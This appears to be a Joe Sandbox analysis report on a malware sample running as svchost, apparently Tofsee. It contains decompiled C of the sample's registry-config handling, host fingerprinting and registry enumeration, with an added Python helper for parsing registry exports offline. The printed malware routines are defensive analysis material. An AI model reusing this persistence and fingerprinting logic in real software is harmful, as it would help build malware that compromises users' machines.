                                                                                0x00128714
                                                                                0x00128733
                                                                                0x00128739
                                                                                0x0012873b
                                                                                0x0012874f
                                                                                0x00128755
                                                                                0x00000000
                                                                                0x0012875a
                                                                                0x00128746
                                                                                0x0012874b
                                                                                0x00000000
                                                                                0x0012874b
                                                                                0x0012862c
                                                                                0x00128633
                                                                                0x00128638
                                                                                0x00128639
                                                                                0x00128644
                                                                                0x00128647
                                                                                0x0012864a
                                                                                0x0012864c
                                                                                0x00128671
                                                                                0x00128683
                                                                                0x0012868c
                                                                                0x00128693
                                                                                0x0012869f
                                                                                0x001286a4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012864e
                                                                                0x0012864e
                                                                                0x0012864e
                                                                                0x00128657
                                                                                0x0012865d
                                                                                0x00128660
                                                                                0x00128663
                                                                                0x00128666
                                                                                0x0012866c
                                                                                0x0012866c
                                                                                0x00000000
                                                                                0x0012864e
                                                                                0x001285da
                                                                                0x001285df
                                                                                0x001285e2
                                                                                0x001285e5
                                                                                0x001285eb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x001285ed
                                                                                0x001285ef
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x001285f4
                                                                                0x001285fa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00128601
                                                                                0x00128606
                                                                                0x00128609
                                                                                0x0012860f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012860f
                                                                                0x001283c2
                                                                                0x001283df
                                                                                0x001283e2
                                                                                0x001283e5
                                                                                0x001283ea
                                                                                0x001283f3
                                                                                0x001283f9
                                                                                0x001283fb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00128414
                                                                                0x0012841a
                                                                                0x0012841c
                                                                                0x0012842d
                                                                                0x0012843e
                                                                                0x00128441
                                                                                0x00128447
                                                                                0x0012844a
                                                                                0x00000000
                                                                                0x0012844a
                                                                                0x0012841e
                                                                                0x00128421
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00128423
                                                                                0x00128426
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00128428
                                                                                0x0012842b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012842b
                                                                                0x0012838d

                                                                                APIs
                                                                                • RegOpenKeyExA.KERNEL32(80000002,00000000,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 001283F3
                                                                                • RegQueryValueExA.KERNEL32(00130750,?,00000000,?,00128893,?,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00128414
                                                                                • RegSetValueExA.KERNEL32(00130750,?,00000000,00000004,00128893,00000004,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00128441
                                                                                • RegCloseKey.ADVAPI32(00130750,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 0012844A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Value$CloseOpenQuery
                                                                                • String ID: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe$localcfg
                                                                                • API String ID: 237177642-1194859034
                                                                                • Opcode ID: b0e5f0604cac6de8dac7d58bf5796bbee2f5cb473522455628075873a909bf4e
                                                                                • Instruction ID: 39f2d86f69b825a3a92feb9e312e098b57ed9ac5a81319a4a9461cf3bd3e50f8
                                                                                • Opcode Fuzzy Hash: b0e5f0604cac6de8dac7d58bf5796bbee2f5cb473522455628075873a909bf4e
                                                                                • Instruction Fuzzy Hash: CFC180B1D41269BFEF11ABA4FC85EEE7BBCEB18304F144465F505A2051EB705EA4CB21
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

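The function above reads and writes the sample's configuration as REG_DWORD values under an HKLM subkey named localcfg (RegOpenKeyExA with 0x80000002, RegQueryValueExA, RegSetValueExA with type 4 and size 4), and the decompiled E00121D96 listing further down consumes those values (lid_file_upd, flags_upd, net_type, born_date) while packing the OS version as (dwMajorVersion << 4) + dwMinorVersion. The following Python triage helper is an added example, not part of the Joe Sandbox report or of the sample: it parses a .reg export of such a key offline and mirrors the config handling that is visible in the listing. The key path, the value types of work_srv and start_srv and all numbers in the sample export are constructed; what E0012DF70, E0012EA84 and E0012199C actually do is not shown on the page, and the assumptions made about them are marked in the comments.

```python
# Added triage helper, not part of the Joe Sandbox report or the Tofsee sample.
# It parses a .reg export offline and mirrors the config handling visible in
# the decompiled E00121D96 listing.  Semantics beyond what the listing shows
# (what E0012DF70 / E0012EA84 / E0012199C do) are ASSUMPTIONS, labelled below.
import re

# Constructed sample export.  The report only shows the subkey name "localcfg"
# under HKLM (0x80000002); the full path, the types of work_srv/start_srv and
# every number here are invented for illustration.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Hypothetical\localcfg]
"lid_file_upd"=dword:00000001
"flags_upd"=dword:00000009
"net_type"=dword:00000003
"born_date"=dword:63e0ab40
"work_srv"="C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe"
"start_srv"=dword:00000001
"""

KEY_RE = re.compile(r"^\[(.+)\]$")
DWORD_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')
STR_RE = re.compile(r'^"([^"]+)"="(.*)"$')


def parse_reg_export(text):
    """Parse the subset of .reg syntax used above into {key_path: {name: value}}."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys[current] = {}
            continue
        if current is None or not line:
            continue
        m = DWORD_RE.match(line)
        if m:
            keys[current][m.group(1)] = int(m.group(2), 16)
            continue
        m = STR_RE.match(line)
        if m:
            # .reg escapes a backslash as "\\"; undo that for the path string.
            keys[current][m.group(1)] = m.group(2).replace("\\\\", "\\")
    return keys


def find_localcfg(keys):
    """Return (path, values) of the first key whose last component is 'localcfg'."""
    for path, values in keys.items():
        if path.rsplit("\\", 1)[-1].lower() == "localcfg":
            return path, values
    return None, None


def apply_flags_upd(values):
    """Mirror the flags_upd handling in E00121D96.

    The listing ORs flags_upd into the bot state; if bit 3 (0x8) is set it
    masks it off with 0xfffffff7, calls E0012DF70 on "work_srv" and
    "start_srv", then calls E0012EA84 on "flags_upd".  ASSUMPTION: E0012DF70
    deletes the named value and E0012EA84 writes the flags back (consistent
    with the RegSetValueExA REG_DWORD call in the APIs list, not proven by it).
    """
    state = dict(values)
    actions = []
    flags = state.get("flags_upd", 0)
    if flags & 0x8:
        flags &= 0xFFFFFFF7
        for name in ("work_srv", "start_srv"):
            if state.pop(name, None) is not None:
                actions.append(f"delete {name}")
        state["flags_upd"] = flags
        actions.append(f"write flags_upd=0x{flags:08x}")
    return state, actions


def encode_os_version(major, minor):
    """(dwMajorVersion << 4) + dwMinorVersion, truncated to the byte at +0x41."""
    return ((major << 4) + minor) & 0xFF


def decode_os_version(byte):
    """Inverse of encode_os_version; unambiguous only while minor < 16, which
    holds for every Windows release (0x61 -> 6.1, 0x63 -> 6.3, 0xa0 -> 10.0)."""
    return byte >> 4, byte & 0xF


def net_type_marker(net_type, probe_ok):
    """E00121D96 ORs 0x20 into net_type when E0012199C(net_type) returns
    non-zero and 0x10 when it returns zero.  What that probe tests is not shown;
    probe_ok stands in for its result."""
    return net_type | (0x20 if probe_ok else 0x10)


if __name__ == "__main__":
    path, values = find_localcfg(parse_reg_export(SAMPLE_REG_EXPORT))
    print(path, values)
    print(apply_flags_upd(values))
    print(decode_os_version(encode_os_version(6, 1)))
```

On an infected host the input would come from `reg export <key path> localcfg.reg` once the localcfg subkey has been located under HKLM; the report does not give the parent path, so locate it by name rather than hard-coding one. The version byte is worth decoding on its own: a fingerprint value of 0x61 or 0xa0 in captured traffic or memory is the host's Windows version, not an opaque constant.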
                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 929 121d96-121dce call 12ee2a GetVersionExA 932 121de0 929->932 933 121dd0-121dde 929->933 934 121de3-121e14 GetSystemInfo GetModuleHandleA GetProcAddress 932->934 933->934 935 121e16-121e21 GetCurrentProcess 934->935 936 121e24-121e59 call 12e819 * 2 934->936 935->936 941 121e7a-121ea0 call 12ea84 call 12e819 call 12199c 936->941 942 121e5b-121e77 call 12df70 * 2 936->942 953 121ea2-121ea6 941->953 954 121ea8 941->954 942->941 955 121eac-121ec1 call 12e819 953->955 954->955 958 121ec3-121ede call 12f04e call 12ea84 955->958 959 121ee0-121ef6 call 12e819 955->959 958->959 964 121f14-121f2b call 12e819 959->964 965 121ef8 call 121b71 959->965 973 121f49-121f65 call 12e819 964->973 974 121f2d call 121bdf 964->974 970 121efd-121f11 call 12ea84 965->970 970->964 980 121f67-121f77 call 12ea84 973->980 981 121f7a-121f8c call 1230b5 973->981 979 121f32-121f46 call 12ea84 974->979 979->973 980->981 988 121f93-121f9a 981->988 989 121f8e-121f91 981->989 991 121fb7 988->991 992 121f9c-121fa3 call 126ec3 988->992 990 121fbb-121fc0 989->990 993 121fc2 990->993 994 121fc9-121fea GetTickCount 990->994 991->990 997 121fa5-121fac 992->997 998 121fae-121fb5 992->998 993->994 997->990 998->990
                                                                                C-Code - Quality: 95%
                                                                                			E00121D96(void* __ecx, intOrPtr* _a4) {
                                                                                				struct _OSVERSIONINFOA _v156;
                                                                                				struct _SYSTEM_INFO _v192;
                                                                                				char _v196;
                                                                                				intOrPtr _v200;
                                                                                				intOrPtr _t59;
                                                                                				signed int _t61;
                                                                                				signed int _t63;
                                                                                				void* _t64;
                                                                                				void* _t65;
                                                                                				intOrPtr _t66;
                                                                                				intOrPtr _t67;
                                                                                				intOrPtr _t69;
                                                                                				signed int _t71;
                                                                                				intOrPtr _t74;
                                                                                				intOrPtr _t77;
                                                                                				intOrPtr _t93;
                                                                                				intOrPtr _t96;
                                                                                				intOrPtr _t97;
                                                                                				intOrPtr _t102;
                                                                                				intOrPtr* _t103;
                                                                                				intOrPtr* _t105;
                                                                                				void* _t109;
                                                                                				void* _t110;
                                                                                				void* _t111;
                                                                                				void* _t112;
                                                                                				void* _t113;
                                                                                				void* _t114;
                                                                                
                                                                                				_t105 = _a4;
                                                                                				_t102 = 0x64;
                                                                                				E0012EE2A(__ecx, _t105, 0, _t102);
                                                                                				_t109 =  &_v200 + 0xc;
                                                                                				 *_t105 = _t102;
                                                                                				_v156.dwOSVersionInfoSize = 0x9c;
                                                                                				if(GetVersionExA( &_v156) == 0) {
                                                                                					 *((char*)(_t105 + 0x41)) = 0;
                                                                                				} else {
                                                                                					 *((char*)(_t105 + 0x41)) = (_v156.dwMajorVersion << 4) + _v156.dwMinorVersion;
                                                                                				}
                                                                                				GetSystemInfo( &_v192); // executed
                                                                                				 *((char*)(_t105 + 0x3f)) = _v192.dwNumberOfProcessors;
                                                                                				_v196 = 0;
                                                                                				_t103 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
                                                                                				if(_t103 != 0) {
                                                                                					 *_t103(GetCurrentProcess(),  &_v196);
                                                                                				}
                                                                                				_t104 = "localcfg";
                                                                                				 *((char*)(_t105 + 0x40)) = 2;
                                                                                				_t59 = E0012E819(1, "localcfg", "lid_file_upd", 0);
                                                                                				_t92 = "flags_upd";
                                                                                				 *((intOrPtr*)(_t105 + 0x24)) = _t59;
                                                                                				 *(_t105 + 4) =  *(_t105 + 4) | E0012E819(1, "localcfg", "flags_upd", 0);
                                                                                				_t61 =  *(_t105 + 4);
                                                                                				_t110 = _t109 + 0x20;
                                                                                				if((_t61 & 0x00000008) != 0) {
                                                                                					 *(_t105 + 4) = _t61 & 0xfffffff7;
                                                                                					E0012DF70(1, "work_srv");
                                                                                					E0012DF70(1, "start_srv");
                                                                                					_t110 = _t110 + 0x10;
                                                                                				}
                                                                                				E0012EA84(1, _t104, _t92, 0); // executed
                                                                                				_t93 = 0;
                                                                                				_t63 = E0012E819(1, _t104, "net_type", 0);
                                                                                				_t111 = _t110 + 0x20;
                                                                                				 *(_t105 + 0x14) = _t63;
                                                                                				_t64 = E0012199C(_t63); // executed
                                                                                				if(_t64 == 0) {
                                                                                					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000010;
                                                                                				} else {
                                                                                					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000020;
                                                                                				}
                                                                                				_t65 = E0012E819(1, _t104, "born_date", _t93);
                                                                                				_t112 = _t111 + 0x10;
                                                                                				 *((intOrPtr*)(_t105 + 0x30)) = _t93;
                                                                                				if(_t65 == _t93) {
                                                                                					_t97 = E0012F04E(_t93);
                                                                                					E0012EA84(1, _t104, "born_date", _t97);
                                                                                					_t112 = _t112 + 0x14;
                                                                                					 *((intOrPtr*)(_t105 + 0x30)) = _t97;
                                                                                					_t93 = 0;
                                                                                				}
                                                                                				_t94 = "id";
                                                                                				_t66 = E0012E819(1, _t104, "id", _t93);
                                                                                				_t113 = _t112 + 0x10;
                                                                                				 *((intOrPtr*)(_t105 + 0xc)) = _t66;
                                                                                				if(_t66 == 0) {
                                                                                					_t77 = E00121B71(); // executed
                                                                                					_v200 = _t77;
                                                                                					E0012EA84(1, _t104, _t94, _t77);
                                                                                					_t113 = _t113 + 0x10;
                                                                                					 *((intOrPtr*)(_t105 + 0xc)) = _v200;
                                                                                				}
                                                                                				_t95 = "hi_id";
                                                                                				_t67 = E0012E819(1, _t104, "hi_id", 0);
                                                                                				_t114 = _t113 + 0x10;
                                                                                				 *((intOrPtr*)(_t105 + 0x10)) = _t67;
                                                                                				if(_t67 == 0) {
                                                                                					_t74 = E00121BDF(); // executed
                                                                                					_v200 = _t74;
                                                                                					E0012EA84(1, _t104, _t95, _t74);
                                                                                					_t114 = _t114 + 0x10;
                                                                                					 *((intOrPtr*)(_t105 + 0x10)) = _v200;
                                                                                				}
                                                                                				 *((intOrPtr*)(_t105 + 8)) = 0x61;
                                                                                				_t96 = E0012E819(1, _t104, "loader_id", 0);
                                                                                				if(_t96 == 0) {
                                                                                					_t96 = 4;
                                                                                					E0012EA84(1, _t104, "loader_id", _t96);
                                                                                				}
                                                                                				 *((intOrPtr*)(_t105 + 0x1c)) = _t96;
                                                                                				_t69 = E001230B5(); // executed
                                                                                				 *((intOrPtr*)(_t105 + 0x34)) = _t69;
                                                                                				if( *0x13201d == 0) {
                                                                                					if( *0x13201f == 0) {
                                                                                						 *(_t105 + 0x18) =  *(_t105 + 0x18) & 0x00000000;
                                                                                					} else {
                                                                                						if(E00126EC3() != 0) {
                                                                                							 *(_t105 + 0x18) = 2;
                                                                                						} else {
                                                                                							 *(_t105 + 0x18) = 0x10;
                                                                                						}
                                                                                					}
                                                                                				} else {
                                                                                					 *(_t105 + 0x18) = 1;
                                                                                				}
                                                                                				if(_v196 != 0) {
                                                                                					 *(_t105 + 0x18) =  *(_t105 + 0x18) | 0x00000200;
                                                                                				}
                                                                                				_t71 = GetTickCount() / 0x3e8;
                                                                                				 *0x132110 = _t71;
                                                                                				 *(_t105 + 0x28) = _t71;
                                                                                				return _t71;
                                                                                			}

                                                                                APIs
                                                                                • GetVersionExA.KERNEL32 ref: 00121DC6
                                                                                • GetSystemInfo.KERNEL32(?), ref: 00121DE8
                                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 00121E03
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00121E0A
                                                                                • GetCurrentProcess.KERNEL32(?), ref: 00121E1B
                                                                                • GetTickCount.KERNEL32 ref: 00121FC9
                                                                                  • Part of subcall function 00121BDF: GetComputerNameA.KERNEL32(?,0000000F), ref: 00121C15
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
                                                                                • String ID: IsWow64Process$born_date$flags_upd$hi_id$kernel32$lid_file_upd$loader_id$localcfg$net_type$start_srv$work_srv
                                                                                • API String ID: 4207808166-1381319158
                                                                                • Opcode ID: 79f174784c01a340a8dddc836ca297e83c98aff889ca4755841d5dee90f13928
                                                                                • Instruction ID: d2a40711310c26ec95492115e99714167eb8c0398097a90bea0bdbb453c0ed3f
                                                                                • Opcode Fuzzy Hash: 79f174784c01a340a8dddc836ca297e83c98aff889ca4755841d5dee90f13928
                                                                                • Instruction Fuzzy Hash: 3351C1B09043547FE320EF75AC86F67BAECFB68704F04091DF59682542E774A928C7A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph (graph rendering omitted)
                                                                                C-Code - Quality: 76%
                                                                                			E001273FF(void* __ecx, intOrPtr* _a4, signed int* _a8, int** _a12, char* _a16, char* _a20) {
                                                                                				CHAR* _v8;
                                                                                				void* _v12;
                                                                                				int _v16;
                                                                                				void* _v20;
                                                                                				int* _v24;
                                                                                				char* _v28;
                                                                                				intOrPtr _v32;
                                                                                				int _v36;
                                                                                				char _v295;
                                                                                				char _v296;
                                                                                				char _v556;
                                                                                				void _v592;
                                                                                				intOrPtr* _t85;
                                                                                				int** _t86;
                                                                                				char* _t87;
                                                                                				char* _t88;
                                                                                				char* _t91;
                                                                                				long _t92;
                                                                                				signed int _t93;
                                                                                				long _t97;
                                                                                				signed int _t103;
                                                                                				long _t107;
                                                                                				char* _t118;
                                                                                				intOrPtr* _t119;
                                                                                				CHAR* _t123;
                                                                                				void* _t125;
                                                                                				char* _t127;
                                                                                				intOrPtr* _t134;
                                                                                				void* _t136;
                                                                                				intOrPtr _t137;
                                                                                				signed int* _t146;
                                                                                				int** _t147;
                                                                                				void* _t160;
                                                                                				signed int _t163;
                                                                                				intOrPtr _t164;
                                                                                				void* _t165;
                                                                                				intOrPtr _t167;
                                                                                				intOrPtr _t172;
                                                                                				intOrPtr* _t173;
                                                                                				void* _t186;
                                                                                				intOrPtr _t187;
                                                                                				int* _t188;
                                                                                				void* _t190;
                                                                                				void* _t191;
                                                                                				char* _t192;
                                                                                				signed int _t194;
                                                                                				int* _t196;
                                                                                				void* _t202;
                                                                                				void* _t203;
                                                                                				void* _t204;
                                                                                				void* _t206;
                                                                                
                                                                                				_t165 = __ecx;
                                                                                				_t85 = _a8;
                                                                                				_t188 = 0;
                                                                                				_v16 = 0x104;
                                                                                				if(_t85 != 0) {
                                                                                					 *_t85 = 0;
                                                                                				}
                                                                                				_t86 = _a12;
                                                                                				if(_t86 != _t188) {
                                                                                					 *_t86 = _t188;
                                                                                				}
                                                                                				_t87 = _a16;
                                                                                				if(_t87 != _t188) {
                                                                                					 *_t87 = 0;
                                                                                				}
                                                                                				_t88 = _a20;
                                                                                				if(_t88 != _t188) {
                                                                                					 *_t88 = 0;
                                                                                				}
                                                                                				_v32 = E00126DC2(_t165);
                                                                                				_t160 = 0xe4;
                                                                                				_t91 = E00122544(0x1322f8, 0x1306e8, 0x22, 0xe4, 0xc8);
                                                                                				_t204 = _t203 + 0x14;
                                                                                				_t92 = RegOpenKeyExA(0x80000002, _t91, _t188, 0x20119,  &_v20); // executed
                                                                                				_push(0x100);
                                                                                				_push(_t188);
                                                                                				_push(0x1322f8);
                                                                                				if(_t92 != 0) {
                                                                                					_t93 = E0012EE2A(_t165);
                                                                                					goto L66;
                                                                                				} else {
                                                                                					E0012EE2A(_t165);
                                                                                					_t206 = _t204 + 0xc;
                                                                                					_push(_v16);
                                                                                					_push( &_v556);
                                                                                					_v24 = _t188;
                                                                                					_push(_t188);
                                                                                					while(1) {
                                                                                						_t97 = RegEnumKeyA(_v20, ??, ??, ??); // executed
                                                                                						if(_t97 != 0) {
                                                                                							break;
                                                                                						}
                                                                                						if(E00126CAD( &_v556) == 0) {
                                                                                							L41:
                                                                                							_v24 =  &(_v24[0]);
                                                                                							_push(0x104);
                                                                                							_v16 = 0x104;
                                                                                							_push( &_v556);
                                                                                							_push(_v24);
                                                                                							continue;
                                                                                						}
                                                                                						_t103 = E0012F1A5( &_v556);
                                                                                						_pop(_t167);
                                                                                						if((_t103 ^ 0x61616161) != _v32) {
                                                                                							goto L41;
                                                                                						}
                                                                                						_v12 = _t188;
                                                                                						_v16 = 0x104;
                                                                                						_t107 = RegOpenKeyExA(_v20,  &_v556, _t188, 0x101,  &_v12); // executed
                                                                                						if(_t107 != _t188) {
                                                                                							L45:
                                                                                							if(_t107 != 5) {
                                                                                								L50:
                                                                                								E0012EE2A(_t167, 0x1322f8, _t188, 0x100);
                                                                                								_t206 = _t206 + 0xc;
                                                                                								L39:
                                                                                								if(_v12 != _t188) {
                                                                                									RegCloseKey(_v12);
                                                                                								}
                                                                                								goto L41;
                                                                                							}
                                                                                							E0012EF00(_a16,  &_v556);
                                                                                							if(_v12 != _t188) {
                                                                                								RegCloseKey(_v12);
                                                                                							}
                                                                                							_push(4);
                                                                                							_pop(0);
                                                                                							L64:
                                                                                							RegCloseKey(_v20);
                                                                                							return 0;
                                                                                						}
                                                                                						_t118 = E00122544(0x1322f8, 0x1306dc, 0xa, _t160, 0xc8);
                                                                                						_t206 = _t206 + 0x14;
                                                                                						_t107 = RegQueryValueExA(_v12, _t118, _t188,  &_v36,  &_v296,  &_v16); // executed
                                                                                						if(_t107 != _t188) {
                                                                                							goto L45;
                                                                                						}
                                                                                						_t119 =  &_v556;
                                                                                						_t186 = _t119 + 1;
                                                                                						do {
                                                                                							_t167 =  *_t119;
                                                                                							_t119 = _t119 + 1;
                                                                                						} while (_t167 != 0);
                                                                                						if(_v16 <= _t119 - _t186) {
                                                                                							goto L50;
                                                                                						}
                                                                                						_t123 = E0012EE95( &_v296,  &_v556);
                                                                                						_pop(_t167);
                                                                                						_v8 = _t123;
                                                                                						if(_t123 == _t188) {
                                                                                							goto L50;
                                                                                						}
                                                                                						_t125 = E0012EE95(_v8, E00122544(0x1322f8, 0x130694, 5, _t160, 0xc8));
                                                                                						_t206 = _t206 + 0x1c;
                                                                                						if(_t125 == 0) {
                                                                                							_t188 = 0;
                                                                                							goto L50;
                                                                                						}
                                                                                						if(_v296 != 0x22) {
                                                                                							_t127 = E0012ED03( &_v296, 0x20);
                                                                                							_pop(_t167);
                                                                                						} else {
                                                                                							E0012EF00( &_v296,  &_v295);
                                                                                							_t127 = E0012ED03( &_v296, 0x22);
                                                                                							_t206 = _t206 + 0x10;
                                                                                						}
                                                                                						if(_t127 != 0) {
                                                                                							 *_t127 = 0;
                                                                                						}
                                                                                						_v8 = E0012EE95( &_v296,  &_v556);
                                                                                						_v28 = E0012EE95(_v8, E00122544(0x1322f8, 0x130694, 5, _t160, 0xc8));
                                                                                						E0012EE2A(_t167, 0x1322f8, 0, 0x100);
                                                                                						_t134 = _a4;
                                                                                						_t206 = _t206 + 0x30;
                                                                                						_t190 = _t134 + 1;
                                                                                						do {
                                                                                							_t172 =  *_t134;
                                                                                							_t134 = _t134 + 1;
                                                                                						} while (_t172 != 0);
                                                                                						_t173 = _v8;
                                                                                						_t191 = _t134 - _t190;
                                                                                						_t43 = _t173 + 1; // 0x1
                                                                                						_t136 = _t43;
                                                                                						do {
                                                                                							_t187 =  *_t173;
                                                                                							_t173 = _t173 + 1;
                                                                                						} while (_t187 != 0);
                                                                                						_t174 = _t173 - _t136;
                                                                                						if(_t191 <= _t173 - _t136 || E0012ED77(_t191 - _t174 + _a4, _v8) != 0) {
                                                                                							_t192 = _v28;
                                                                                							 *_t192 = 0;
                                                                                							_t137 = E0012ED23(_v8, 0x5c);
                                                                                							_v8 = _t137;
                                                                                							if(_t137 != 0) {
                                                                                								_v8 = _v8 + 1;
                                                                                							} else {
                                                                                								_v8 =  &_v296;
                                                                                							}
                                                                                							if(E00126CAD(_v8) == 0) {
                                                                                								 *_t192 = 0x2e;
                                                                                								goto L38;
                                                                                							} else {
                                                                                								_t194 = E0012F1A5(_v8) ^ 0x61616161;
                                                                                								_t163 = _t194 >> 0x00000008 & 0x000000ff;
                                                                                								 *_v28 = 0x2e;
                                                                                								if(E00126C96(_t194) != 0) {
                                                                                									L37:
                                                                                									_t160 = 0xe4;
                                                                                									L38:
                                                                                									_t188 = 0;
                                                                                									goto L39;
                                                                                								}
                                                                                								_t56 = _t163 - 0x51; // -81
                                                                                								if(_t56 > 0x2e || (_t194 & 0x000000ff) >= 0x10) {
                                                                                									goto L37;
                                                                                								} else {
                                                                                									_t196 = 0;
                                                                                									if(GetFileAttributesExA( &_v296, 0,  &_v592) != 0) {
                                                                                										_t196 = 1;
                                                                                									}
                                                                                									_t146 = _a8;
                                                                                									if(_t146 != 0) {
                                                                                										 *_t146 = _t163;
                                                                                									}
                                                                                									_t164 = _a16;
                                                                                									if(_t164 != 0) {
                                                                                										_t202 = _v8 -  &_v296;
                                                                                										E0012EE08(_t164,  &_v296, _t202);
                                                                                										 *((char*)(_t202 + _t164)) = 0;
                                                                                									}
                                                                                									if(_a20 != 0) {
                                                                                										E0012EF00(_a20, _v8);
                                                                                									}
                                                                                									_t147 = _a12;
                                                                                									if(_t147 != 0) {
                                                                                										 *_t147 = _t196;
                                                                                									}
                                                                                									_push(3);
                                                                                									_pop(0);
                                                                                									goto L63;
                                                                                								}
                                                                                							}
                                                                                						} else {
                                                                                							E0012EF00(_a16,  &_v556);
                                                                                							L63:
                                                                                							RegCloseKey(_v12); // executed
                                                                                							goto L64;
                                                                                						}
                                                                                					}
                                                                                					_t93 = RegCloseKey(_v20);
                                                                                					L66:
                                                                                					return _t93 | 0xffffffff;
                                                                                				}
                                                                                			}
                                                                                0x00000000
                                                                                0x0012777e
                                                                                0x00127785
                                                                                0x00127797
                                                                                0x00127799
                                                                                0x00127799
                                                                                0x0012779a
                                                                                0x0012779f
                                                                                0x001277a1
                                                                                0x001277a1
                                                                                0x001277a3
                                                                                0x001277a8
                                                                                0x001277b3
                                                                                0x001277b8
                                                                                0x001277c0
                                                                                0x001277c0
                                                                                0x001277c8
                                                                                0x001277d0
                                                                                0x001277d6
                                                                                0x001277d7
                                                                                0x001277dc
                                                                                0x001277de
                                                                                0x001277de
                                                                                0x001277e0
                                                                                0x001277e2
                                                                                0x00000000
                                                                                0x001277e2
                                                                                0x001276c7
                                                                                0x00127769
                                                                                0x00127773
                                                                                0x001277e3
                                                                                0x001277e6
                                                                                0x00000000
                                                                                0x001277e6
                                                                                0x00127642
                                                                                0x00127717
                                                                                0x00127801
                                                                                0x00000000
                                                                                0x00127801

                                                                                APIs
                                                                                • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,74CB43E0,00000000), ref: 00127472
                                                                                • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00000101,?,?,?,?,?,?,?,74CB43E0,00000000), ref: 001274F0
                                                                                • RegQueryValueExA.KERNEL32(?,00000000,?,00000000,?,?,00000104,?,?,?,?,?,?,74CB43E0,00000000), ref: 00127528
                                                                                • ___ascii_stricmp.LIBCMT ref: 0012764D
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,74CB43E0,00000000), ref: 001276E7
                                                                                • RegEnumKeyA.ADVAPI32(00000000,00000000,?,00000104), ref: 00127706
                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,74CB43E0,00000000), ref: 00127717
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,74CB43E0,00000000), ref: 00127745
                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,74CB43E0,00000000), ref: 001277EF
                                                                                  • Part of subcall function 0012F1A5: lstrlenA.KERNEL32(000000C8,000000E4,001322F8,000000C8,00127150,?), ref: 0012F1AD
                                                                                • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0012778F
                                                                                • RegCloseKey.KERNEL32(?), ref: 001277E6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
                                                                                • String ID: "
                                                                                • API String ID: 3433985886-123907689
                                                                                • Opcode ID: 8402a00818a9cf2a8dc4d14039d41aa67f5345b39a0a035a6363b06e31d017ab
                                                                                • Instruction ID: 29c6374012e37dfeb1bbcf9e8271e44c556924c5ca52cb23a299fe7f112fb78e
                                                                                • Opcode Fuzzy Hash: 8402a00818a9cf2a8dc4d14039d41aa67f5345b39a0a035a6363b06e31d017ab
                                                                                • Instruction Fuzzy Hash: A5C1A171904229AFEB119FA4EC49FEFBBF9EF55310F1400A5F504E6191EB309EA48B60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
